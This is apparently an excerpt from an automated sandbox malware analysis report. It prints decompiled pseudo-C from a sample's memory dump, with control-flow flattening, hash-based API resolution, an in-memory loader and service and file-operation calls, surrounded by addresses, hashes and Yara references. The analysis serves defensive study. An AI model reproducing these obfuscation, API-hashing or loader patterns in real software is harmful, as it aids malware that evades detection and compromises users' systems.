					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x003e8400
                                                                                0x003e8400
                                                                                0x003e8406
                                                                                0x003e840e
                                                                                0x003e8416
                                                                                0x003e841e
                                                                                0x003e8426
                                                                                0x003e842b
                                                                                0x003e8430
                                                                                0x003e8438
                                                                                0x003e8440
                                                                                0x003e8445
                                                                                0x003e844a
                                                                                0x003e8452
                                                                                0x003e845a
                                                                                0x003e8462
                                                                                0x003e846a
                                                                                0x003e8472
                                                                                0x003e847a
                                                                                0x003e8482
                                                                                0x003e8491
                                                                                0x003e8496
                                                                                0x003e849a
                                                                                0x003e84a2
                                                                                0x003e84af
                                                                                0x003e84b3
                                                                                0x003e84bb
                                                                                0x003e84c3
                                                                                0x003e84cb
                                                                                0x003e84cf
                                                                                0x003e84d7
                                                                                0x003e84df
                                                                                0x003e84df
                                                                                0x003e84e3
                                                                                0x003e84e3
                                                                                0x003e84e3
                                                                                0x003e84e3
                                                                                0x003e84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e84ef
                                                                                0x003e866e
                                                                                0x003e8676
                                                                                0x003e8696
                                                                                0x003e869a
                                                                                0x003e86a2
                                                                                0x003e86a6
                                                                                0x003e86aa
                                                                                0x003e86b2
                                                                                0x003e86b4
                                                                                0x00000000
                                                                                0x003e86ba
                                                                                0x003e86ba
                                                                                0x003e86c5
                                                                                0x003e86d1
                                                                                0x003e86bc
                                                                                0x003e86bc
                                                                                0x003e86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e86be
                                                                                0x003e86ba
                                                                                0x003e84f5
                                                                                0x003e84fb
                                                                                0x003e854a
                                                                                0x003e854f
                                                                                0x003e8551
                                                                                0x003e8558
                                                                                0x003e855d
                                                                                0x003e8564
                                                                                0x003e8569
                                                                                0x003e8569
                                                                                0x003e8578
                                                                                0x003e857c
                                                                                0x003e857e
                                                                                0x003e8589
                                                                                0x003e858f
                                                                                0x003e8591
                                                                                0x003e8598
                                                                                0x003e859d
                                                                                0x003e85a4
                                                                                0x003e85a9
                                                                                0x003e85a9
                                                                                0x003e85af
                                                                                0x00000000
                                                                                0x003e84fd
                                                                                0x003e8503
                                                                                0x003e8543
                                                                                0x00000000
                                                                                0x003e8505
                                                                                0x003e850b
                                                                                0x00000000
                                                                                0x003e8511
                                                                                0x003e8511
                                                                                0x003e8518
                                                                                0x003e851f
                                                                                0x003e8524
                                                                                0x003e852b
                                                                                0x003e8530
                                                                                0x003e8530
                                                                                0x003e853a
                                                                                0x003e853c
                                                                                0x00000000
                                                                                0x003e853c
                                                                                0x003e850b
                                                                                0x003e8503
                                                                                0x003e84fb
                                                                                0x00000000
                                                                                0x003e84ef
                                                                                0x003e85c8
                                                                                0x003e85ce
                                                                                0x003e8630
                                                                                0x003e8635
                                                                                0x003e8637
                                                                                0x003e863e
                                                                                0x003e8643
                                                                                0x003e864a
                                                                                0x003e864f
                                                                                0x003e864f
                                                                                0x003e8660
                                                                                0x003e8662
                                                                                0x00000000
                                                                                0x003e85d0
                                                                                0x003e85d0
                                                                                0x003e85d6
                                                                                0x00000000
                                                                                0x003e85d8
                                                                                0x003e85de
                                                                                0x003e85e0
                                                                                0x003e85e7
                                                                                0x003e85ec
                                                                                0x003e85fa
                                                                                0x003e85fa
                                                                                0x003e861d
                                                                                0x003e861f
                                                                                0x003e8621
                                                                                0x003e8624
                                                                                0x00000000
                                                                                0x003e8626
                                                                                0x003e8626
                                                                                0x00000000
                                                                                0x003e8626
                                                                                0x003e8624
                                                                                0x003e85d6
                                                                                0x00000000
                                                                                0x003e85b1
                                                                                0x003e85b1
                                                                                0x003e85b1
                                                                                0x003e85bd
                                                                                0x003e85bd
                                                                                0x003e85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 003E861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: 472e57e7293867e5bdb677b111f23773fe849972d95026ace7cdd8784f07b521
                                                                                • Instruction ID: 500c7301910f722470d9a9eff2b538056911c808465b95a28d2e9b6ca39c0e20
                                                                                • Opcode Fuzzy Hash: 472e57e7293867e5bdb677b111f23773fe849972d95026ace7cdd8784f07b521
                                                                                • Instruction Fuzzy Hash: 93610771A083A19FC726DF6AC44966FB7E5ABD0714F008A1CF4999B2E0DB74DD058F82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 3d0d60-3d0dd5 call 3d0ed0 VirtualAlloc RtlMoveMemory 164 3d0ebe-3d0ec4 160->164 165 3d0ddb-3d0dde 160->165 165->164 166 3d0de4-3d0de6 165->166 166->164 167 3d0dec-3d0df0 166->167 167->164 169 3d0df6-3d0dfd 167->169 170 3d0eaf-3d0ebb 169->170 171 3d0e03-3d0e36 call 3d1140 RtlMoveMemory 169->171 171->164 175 3d0e3c-3d0e4a VirtualAlloc 171->175 176 3d0e4c-3d0e52 175->176 177 3d0e89-3d0ea0 RtlFillMemory 175->177 178 3d0e5a-3d0e68 176->178 179 3d0e54-3d0e56 176->179 177->164 182 3d0ea2-3d0ea5 177->182 178->164 181 3d0e6a-3d0e7d RtlMoveMemory 178->181 179->178 181->164 183 3d0e7f-3d0e83 181->183 182->164 185 3d0ea7-3d0ea9 182->185 183->164 184 3d0e85 183->184 184->177 185->170 185->171
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003D0DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003D0DC3
                                                                                  • Part of subcall function 003D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003D0EFD,00000000), ref: 003D1155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003D0E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003D0E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003D0E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 003D0E98
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 9e8b7cd3626e0777be05d41af131ce27bf54b48a4c8f0476ff1bda202279b9a1
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 1731F473A043406BD32AEB60EC44BAB73E9EBC8B80F044D2EB548D7351D635D880C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E8E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 3e8e80-3e8e98 187 3e8ea0-3e8ea5 186->187 188 3e8f7a-3e8f7f 187->188 189 3e8eab 187->189 190 3e8f85-3e8f8a 188->190 191 3e9011-3e9016 188->191 192 3e8f3f-3e8f46 189->192 193 3e8eb1-3e8eb6 189->193 196 3e8fce-3e8fd5 190->196 197 3e8f8c-3e8f91 190->197 191->187 194 3e8f48-3e8f5e call 3e3f00 call 3e3e60 192->194 195 3e8f63-3e8f75 192->195 198 3e8ebc-3e8ec1 193->198 199 3e901b-3e9022 193->199 194->195 195->187 205 3e8fd7-3e8fed call 3e3f00 call 3e3e60 196->205 206 3e8ff2-3e900c OpenServiceW 196->206 200 3e8fbb-3e8fc0 197->200 201 3e8f93-3e8fa3 197->201 202 3e8efc-3e8f03 198->202 203 3e8ec3-3e8ec8 198->203 207 3e903f 199->207 208 3e9024-3e903a call 3e3f00 call 3e3e60 199->208 200->187 212 3e8fc6-3e8fcd 200->212 209 3e8fae-3e8fb6 201->209 210 3e8fa5-3e8fac 201->210 215 3e8f05-3e8f1b call 3e3f00 call 3e3e60 202->215 216 3e8f20-3e8f2f 202->216 203->200 211 3e8ece-3e8ed5 203->211 205->206 206->187 222 3e9042-3e9049 207->222 208->207 209->187 210->209 210->210 220 3e8ed7-3e8eed call 3e3f00 call 3e3e60 211->220 221 3e8ef2-3e8efa 211->221 215->216 216->222 233 3e8f35-3e8f3a 216->233 220->221 221->187 233->187
                                                                                C-Code - Quality: 66%
                                                                                			E003E8E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x3ee270 == 0) {
									 *0x3ee270 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x3ee54c; // 0x61e730
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x3ee4c8;
						if(_t11 == 0) {
							_t11 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x3ee4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x3ee18c;
							if(_t15 == 0) {
								_t15 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x3ee18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x3ee310;
								if(_t19 == 0) {
									_t19 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x3ee310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x3ee18c;
									if(_t22 == 0) {
										_t22 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x3ee18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x003e8e82
                                                                                0x003e8e86
                                                                                0x003e8e8c
                                                                                0x003e8e91
                                                                                0x003e8e96
                                                                                0x003e8e98
                                                                                0x003e8ea0
                                                                                0x003e8ea0
                                                                                0x003e8ea0
                                                                                0x003e8ea0
                                                                                0x003e8ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e8f7f
                                                                                0x003e9011
                                                                                0x00000000
                                                                                0x003e8f85
                                                                                0x003e8f8a
                                                                                0x003e8fd5
                                                                                0x003e8fed
                                                                                0x003e8fed
                                                                                0x003e8ff9
                                                                                0x003e8ffb
                                                                                0x003e9009
                                                                                0x00000000
                                                                                0x003e8f8c
                                                                                0x003e8f91
                                                                                0x00000000
                                                                                0x003e8f93
                                                                                0x003e8f93
                                                                                0x003e8f99
                                                                                0x003e8fa3
                                                                                0x003e8fa5
                                                                                0x003e8fa8
                                                                                0x003e8fae
                                                                                0x003e8fb1
                                                                                0x00000000
                                                                                0x003e8fb1
                                                                                0x003e8f91
                                                                                0x003e8f8a
                                                                                0x00000000
                                                                                0x003e8f7f
                                                                                0x003e8eab
                                                                                0x003e8f3f
                                                                                0x003e8f46
                                                                                0x003e8f59
                                                                                0x003e8f5e
                                                                                0x003e8f5e
                                                                                0x003e8f64
                                                                                0x003e8f6d
                                                                                0x003e8f70
                                                                                0x00000000
                                                                                0x003e8eb1
                                                                                0x003e8eb6
                                                                                0x003e901b
                                                                                0x003e9022
                                                                                0x003e9035
                                                                                0x003e903a
                                                                                0x003e903a
                                                                                0x003e9040
                                                                                0x00000000
                                                                                0x003e8ebc
                                                                                0x003e8ec1
                                                                                0x003e8efc
                                                                                0x003e8f03
                                                                                0x003e8f16
                                                                                0x003e8f1b
                                                                                0x003e8f1b
                                                                                0x003e8f2b
                                                                                0x003e8f2f
                                                                                0x003e9042
                                                                                0x003e9049
                                                                                0x003e8f35
                                                                                0x003e8f35
                                                                                0x00000000
                                                                                0x003e8f35
                                                                                0x003e8ec3
                                                                                0x003e8ec8
                                                                                0x00000000
                                                                                0x003e8ece
                                                                                0x003e8ece
                                                                                0x003e8ed5
                                                                                0x003e8ee8
                                                                                0x003e8eed
                                                                                0x003e8eed
                                                                                0x003e8ef3
                                                                                0x003e8ef5
                                                                                0x00000000
                                                                                0x003e8ef5
                                                                                0x003e8ec8
                                                                                0x003e8ec1
                                                                                0x003e8eb6
                                                                                0x00000000
                                                                                0x003e8fbb
                                                                                0x003e8fbb
                                                                                0x003e8fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0061E730,003E8782,?,3251FEFE,?), ref: 003E8FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: 0a$uw(#$uw(#
                                                                                • API String ID: 3098006287-1483718473
                                                                                • Opcode ID: 19a09ee68957cdf23ab751ccb57212b7e6e3df349a4df5f5313a38f48bbf4f8a
                                                                                • Instruction ID: 78b6bbc2b881b371af2f345c21dc38916d6cb9b250a0b5c7445f9b289625706d
                                                                                • Opcode Fuzzy Hash: 19a09ee68957cdf23ab751ccb57212b7e6e3df349a4df5f5313a38f48bbf4f8a
                                                                                • Instruction Fuzzy Hash: 7141B321F042E49BDB226BBFACC477A229AA7C4750F510B69F949CF7C1EE60CC415B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E7120, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 241 3e7120 242 3e7125-3e712a 241->242 243 3e71b4-3e71b9 242->243 244 3e7130 242->244 245 3e71bb 243->245 246 3e7207-3e720c 243->246 247 3e7136-3e713b 244->247 248 3e7233-3e7248 call 3e34c0 244->248 251 3e71ee-3e7202 call 3e7080 245->251 252 3e71bd-3e71c2 245->252 254 3e720e-3e7222 call 3e7080 246->254 255 3e7227-3e722c 246->255 249 3e713d 247->249 250 3e7190-3e7195 247->250 268 3e724a-3e7260 call 3e3f00 call 3e3e60 248->268 269 3e7265-3e7278 LoadLibraryW 248->269 257 3e713f-3e7144 249->257 258 3e717a-3e718e call 3e7080 249->258 250->255 263 3e719b-3e71af call 3e7080 250->263 251->242 259 3e71c4-3e71c9 252->259 260 3e71d5-3e71e9 call 3e7080 252->260 254->242 255->242 256 3e7232 255->256 265 3e7146-3e714b 257->265 266 3e7164-3e7178 call 3e7080 257->266 258->242 259->255 267 3e71cb-3e71d0 259->267 260->242 263->242 265->255 275 3e7151-3e7162 call 3e7080 265->275 266->242 267->242 268->269 279 3e727a-3e7290 call 3e3f00 call 3e3e60 269->279 280 3e7295-3e72a0 269->280 275->242 279->280 291 3e72bd-3e72c5 280->291 292 3e72a2-3e72b8 call 3e3f00 call 3e3e60 280->292 292->291
                                                                                C-Code - Quality: 85%
                                                                                			E003E7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E003E34C0(0x3ed830);
							__eflags =  *0x3edd1c;
							if( *0x3edd1c == 0) {
								 *0x3edd1c = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x3ee548; // 0x657de0
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x3ee494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x3ee494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x3edf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x3edf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E003E7080(_t21, 0x3ed7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E003E7080(_t21, 0x3ed8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E003E7080(_t21, 0x3ed800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E003E7080(_t21, 0x3ed860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E003E7080(_t21, 0x3ed890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E003E7080(_t21, 0x3ed7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E003E7080(_t21, 0x3ed8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x003e7120
                                                                                0x003e7120
                                                                                0x003e7120
                                                                                0x003e7125
                                                                                0x003e7125
                                                                                0x003e7125
                                                                                0x003e7125
                                                                                0x003e712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e7130
                                                                                0x003e723f
                                                                                0x003e7246
                                                                                0x003e7248
                                                                                0x003e7260
                                                                                0x003e7260
                                                                                0x003e7266
                                                                                0x003e7268
                                                                                0x003e726e
                                                                                0x003e7271
                                                                                0x003e7276
                                                                                0x003e7278
                                                                                0x003e728b
                                                                                0x003e7290
                                                                                0x003e7290
                                                                                0x003e7297
                                                                                0x003e7299
                                                                                0x003e729e
                                                                                0x003e72a0
                                                                                0x003e72b3
                                                                                0x003e72b8
                                                                                0x003e72b8
                                                                                0x003e72c5
                                                                                0x003e7136
                                                                                0x003e7136
                                                                                0x003e713b
                                                                                0x003e7190
                                                                                0x003e7195
                                                                                0x00000000
                                                                                0x003e719b
                                                                                0x003e71a5
                                                                                0x003e71aa
                                                                                0x00000000
                                                                                0x003e71aa
                                                                                0x003e713d
                                                                                0x003e713d
                                                                                0x003e7184
                                                                                0x003e7189
                                                                                0x00000000
                                                                                0x003e713f
                                                                                0x003e7144
                                                                                0x003e716e
                                                                                0x003e7173
                                                                                0x00000000
                                                                                0x003e7146
                                                                                0x003e7146
                                                                                0x003e714b
                                                                                0x00000000
                                                                                0x003e7151
                                                                                0x003e7158
                                                                                0x003e715d
                                                                                0x00000000
                                                                                0x003e715d
                                                                                0x003e714b
                                                                                0x003e7144
                                                                                0x003e713d
                                                                                0x003e713b
                                                                                0x00000000
                                                                                0x003e7130
                                                                                0x003e71b4
                                                                                0x003e71b9
                                                                                0x003e7207
                                                                                0x003e720c
                                                                                0x00000000
                                                                                0x003e720e
                                                                                0x003e7218
                                                                                0x003e721d
                                                                                0x00000000
                                                                                0x003e721d
                                                                                0x003e71bb
                                                                                0x003e71bb
                                                                                0x003e71f8
                                                                                0x003e71fd
                                                                                0x00000000
                                                                                0x003e71bd
                                                                                0x003e71bd
                                                                                0x003e71c2
                                                                                0x003e71df
                                                                                0x003e71e4
                                                                                0x00000000
                                                                                0x003e71c4
                                                                                0x003e71c4
                                                                                0x003e71c9
                                                                                0x00000000
                                                                                0x003e71cb
                                                                                0x003e71cb
                                                                                0x00000000
                                                                                0x003e71cb
                                                                                0x003e71c9
                                                                                0x003e71c2
                                                                                0x003e71bb
                                                                                0x00000000
                                                                                0x003e7227
                                                                                0x003e7227
                                                                                0x003e7227
                                                                                0x003e7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003E68AC), ref: 003E7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9$}e
                                                                                • API String ID: 1029625771-3228990659
                                                                                • Opcode ID: bb9e6617cedbfdbe6928d1b35d0d9a8d61db983b00d5ad91a9aa2ef536d8f8b2
                                                                                • Instruction ID: a5572c6cf956113bafca362649161f575d7887ecc046480ed099a9fd2f4bd7b1
                                                                                • Opcode Fuzzy Hash: bb9e6617cedbfdbe6928d1b35d0d9a8d61db983b00d5ad91a9aa2ef536d8f8b2
                                                                                • Instruction Fuzzy Hash: 3E31B42170C2F443EE276BBB68D537E11AA97A0304F214766F151CF7D5ED26CE026792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 301 3e3780-3e3793 302 3e3795-3e37ab call 3e3f00 call 3e3e60 301->302 303 3e37b0-3e37c5 301->303 302->303 308 3e37c7-3e37dd call 3e3f00 call 3e3e60 303->308 309 3e37e2-3e37fa 303->309 308->309 315 3e37fc-3e3812 call 3e3f00 call 3e3e60 309->315 316 3e3817-3e3832 309->316 315->316 322 3e384f-3e385e 316->322 323 3e3834-3e384a call 3e3f00 call 3e3e60 316->323 329 3e387b-3e38b4 322->329 330 3e3860-3e3876 call 3e3f00 call 3e3e60 322->330 323->322 336 3e38b6-3e38cc call 3e3f00 call 3e3e60 329->336 337 3e38d1-3e38e2 SHFileOperationW 329->337 330->329 336->337
                                                                                C-Code - Quality: 62%
                                                                                			E003E3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x3eddc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3eddc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x3eddc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3eddc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x3eddc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3eddc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x3ee298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E003E3E60(_t36, E003E3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x3ee298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x3ee298;
				if(_t20 == 0) {
					_t20 = E003E3E60(_t36, E003E3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x3ee298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x3ee30c == 0) {
					 *0x3ee30c = E003E3E60(_t36, E003E3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x003e3785
                                                                                0x003e3780
                                                                                0x003e378c
                                                                                0x003e378f
                                                                                0x003e3793
                                                                                0x003e37a6
                                                                                0x003e37ab
                                                                                0x003e37ab
                                                                                0x003e37b9
                                                                                0x003e37bb
                                                                                0x003e37c0
                                                                                0x003e37c5
                                                                                0x003e37d8
                                                                                0x003e37dd
                                                                                0x003e37dd
                                                                                0x003e37ee
                                                                                0x003e37f0
                                                                                0x003e37f5
                                                                                0x003e37fa
                                                                                0x003e380d
                                                                                0x003e3812
                                                                                0x003e3812
                                                                                0x003e3826
                                                                                0x003e3828
                                                                                0x003e382d
                                                                                0x003e3832
                                                                                0x003e3845
                                                                                0x003e384a
                                                                                0x003e384a
                                                                                0x003e3855
                                                                                0x003e3857
                                                                                0x003e385e
                                                                                0x003e3871
                                                                                0x003e3876
                                                                                0x003e3876
                                                                                0x003e3884
                                                                                0x003e388a
                                                                                0x003e3892
                                                                                0x003e389d
                                                                                0x003e38a6
                                                                                0x003e38b4
                                                                                0x003e38cc
                                                                                0x003e38cc
                                                                                0x003e38d5
                                                                                0x003e38d9
                                                                                0x003e38e2

                                                                                APIs
